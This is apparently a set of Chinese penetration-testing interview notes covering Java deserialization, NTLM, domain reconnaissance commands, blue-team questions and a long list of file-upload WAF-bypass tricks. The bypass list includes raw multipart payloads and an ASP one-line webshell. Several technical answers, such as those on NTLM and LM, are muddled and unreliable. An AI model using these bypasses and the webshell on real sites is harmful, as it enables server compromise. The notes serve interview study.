java

classloader是什么

classloader是java动态类加载机制,在java中类加载分为加载,连接,初始化,classloader是负责加载和连接的,加载器可以根据需要动态的加载类,使得程序在运行时可以动态的扩展,无需在编译时将所有的类都加载进来

classloader实现了一种双亲委派模型,

四种类加载器

BootStrapClassLoader系统类根类加载器 加载 核心类库里面的类 java.lang包

PlatformClassLoader 平台类加载器 加载核心类库里面的一些类

AppClassLoader系统类加载器 加载的是自己编写的类

自定义类加载器 加载网络环境下的类

加载自定义classloader的前提是什么

加载自定义ClassLoader的前提是需要一个已经存在的ClassLoader。因为ClassLoader本身也是一个Java类,它也需要被加载和实例化。在Java中,所有的ClassLoader都是由其他ClassLoader加载的,最终都会由Bootstrap ClassLoader(系统根类加载器)加载。

调用类的四种方法

类.class

类.getClass()

Class.forName(“类”)

ClassLoader cl = ClassLoader.getSystemClassLoader();
class<?> c = cl.loadclass("类")
fastjson的反序列化和普通反序列化漏洞的区别是什么?

普通的反序列化漏洞通常是针对Java对象序列化/反序列化机制的漏洞,攻击者可以构造恶意的序列化数据,使得反序列化时执行恶意代码,从而实现攻击。而Fastjson的特性是支持反序列化时自动类型识别和类型转换,这为攻击者提供了构造恶意JSON字符串的机会。

大概讲一下CommonCollections1的利用链,该利用链有什么样的限制?

在tomcat中实现内存马有哪些方式,有办法实现重启之后依然不会消失的内存马吗?
单向代码执行链如何实现执行多条语句,如CommonCollections1

请简单讲述一下Shiro反序列化漏洞的原理,无法使用ysoerial中common-collections利用链的原因是什么?

内网

administrator和system用户切换

令牌窃取切换,计划任务

NTML的V1和V2有什么区别

加密方式不同,8位,16位

ML和NTML有什么区别

ML是第一版,采用des加密,密码14位 ,加密步骤 十几步 xp还在用

NTML MD4加密非对称加密,步骤三步

如何隐藏后门的服务

设置访问控制

黄金票据需要什么权限

判断是否存在域环境

ipconfig /all 看是否存在一个网段

net time /domain 判断主域 域服务器通常会作为时间服务器使用

systeminfo

net config workstation 查看当前域与登录用户信息

探测域内存活主机:(nbtscan ) nbtscan.exe 192.168.1.0/24

实战

空白页面怎么测

改post,get 改ua,refer,origin,代理,翻js,目录爆破,漏扫工具扫

绕过

编码绕过

403怎么测试

改ip,改host,比如访问的admin目录,可以添加辣鸡字符绕过(/*.),cdn,测ip

短信轰炸绕过

改验证码,添加垃圾数据/r/n+,

文件上传绕waf

  1. filename换行绕过
  2. 多个等号绕过 例如:filename=====”a.php”
  3. 增加文件大小,类似于sql注入的大量垃圾字符绕waf
Content-Disposition: form-data; aaaaaaaaaaaaaaaaaaaaa......aaaaaaaaaaaaaaaaaaaaa;name="file"; filename="a.php"

4.去掉双引号或者替换成单引号

第一种:
Content-Disposition: form-data; name=file1; filename=a.php
第二种:
Content-Disposition: form-data; name='file1'; filename="a.php"

5.双写

Content-Disposition: form-data; name="file"; filename= ;  filename="a.php"

6.混淆waf匹配字段

#混淆form-data
Content-Disposition: name="file"; filename="a.php"
去除form-data
Content-Disposition: AAAAAAAA="BBBBBBBB"; name="file"; filename="a.php"
替换form-data为垃圾值
Content-Disposition: form-data ; name="file"; filename="a.php"
form-data后加空格
Content-Disposition: for+m-data; name="file"; filename="a.php"
form-data中加+

#混淆ConTent-Disposition
COntEnT-DIsposiTiOn: form-data; name="file"; filename="a.php"
大小写混淆
Content-Type: image/gif
Content-Disposition: form-data; name="file"; filename="a.php"
调换Content-Type和ConTent-Disposition的顺序
Content-Type: image/gif
Content-Disposition: form-data; name="file"; filename="a.php"
Content-Type: image/gif
增加额外的头
AAAAAAAA:filename="aaa.jpg";
Content-Disposition: form-data; name="file"; filename="a.php"
Content-Type: image/gif
增加额外的头
Content-Length: 666
Content-Disposition: form-data; name="file"; filename="a.php"
Content-Type: image/gif
增加额外的头

7.双文件绕过

waf会把最后一个值作为接收参数,,老款中间件iis6.0会把第一个值作为参数

8.容器waf对boundary要求不一致

一些WAF会认为两段Boundary不一致的数据是无意义的,不进行检测,而容器并没有严格要求,正常接收数据。

Content-Type: multipart/form-data; boundary=---------------------------471****1141173****525****99
Content-Length: 253
-----------------------------471****1141173****525****99
Content-Disposition: form-data; name="file1"; filename="shell.asp"
Content-Type: application/octet-stream
<%eval request("a")%>
-----------------------------471****1141173****525****99--

9.条件竞争

绿盟笔试

1.客户在九月二号上线新门户网站,其中只有nginx代理的443端口是直接面向互联网开放。在九月四号SOC平台上监控到门户系统存在异常wget下载行为,SOC人员上去门户主机查看对应时间段的访问日志未发现明显的攻击访问记录,叙述后续排查思路

2.拿到一台机器的权限,如何判断什么协议出网以及怎样搭建隧道,负载均衡场景下的隧道又是怎样去搭建

3.假设现在已经通过打点的方式获取到一台服务器权限,详细说说你是怎样开展内网渗透的

4.在攻防演练中,只给你一个公司名称,说说通过哪些方式可以进入目标单位的内网,如何开展信息收集

5.一个网站存在命令执行漏洞,但是无回显,怎么深入利用

6.实战内网横向时,如何判断内网是否有域环境

8.请简要说明TCP连接的建立过程,并使用伪代码描述TCP服务端和客户端如何建立连接

9描述恶意样本分析的思路流程

10,目前存在一个前后端分离的web站点,请简述一下渗透思路

ct蓝中

SQL注入的类型, 报错注入函数三个,主流防御sql注入的方式

报错函数 Polygon,GeometryCollection,MultiPoint,MultiLineString

中间件漏洞讲一下,weblogic,log4j,shiro,fastjson特征 jndi的攻击复现过没有,具体的细节是什么
监控的时候怎么区分扫描器和真实攻击ip
护网的时候用过什么设备
内网了解吗,xxx工具用过没

告警出现dns隐匿隧道,dns隐匿隧道如何区分,是不是误报 ,dns隧道和常规的dns解析有什么区别
ps:金融的一些内网流量可以dns解析出去,但是ping不通

落地的wabshell怎么开展工作,排查工具有什么
怎么排查自启动项

文件上传绕waf
溯源怎么溯
cs反制rce (CVE-2022-39197,CVE-2022-23317,CVE-2021-36798)
内网的重点系统是什么,比如说集权之类的,域控算一个,还有什么

webshell工具特征

jsp马

不管是普通还是魔改的工具,都是post传输,因为webshell的payload过于巨大,超过了默认的tomcat header大小(8024字节),所以只能使用POST传输,流量监测设备都是重点监控POST请求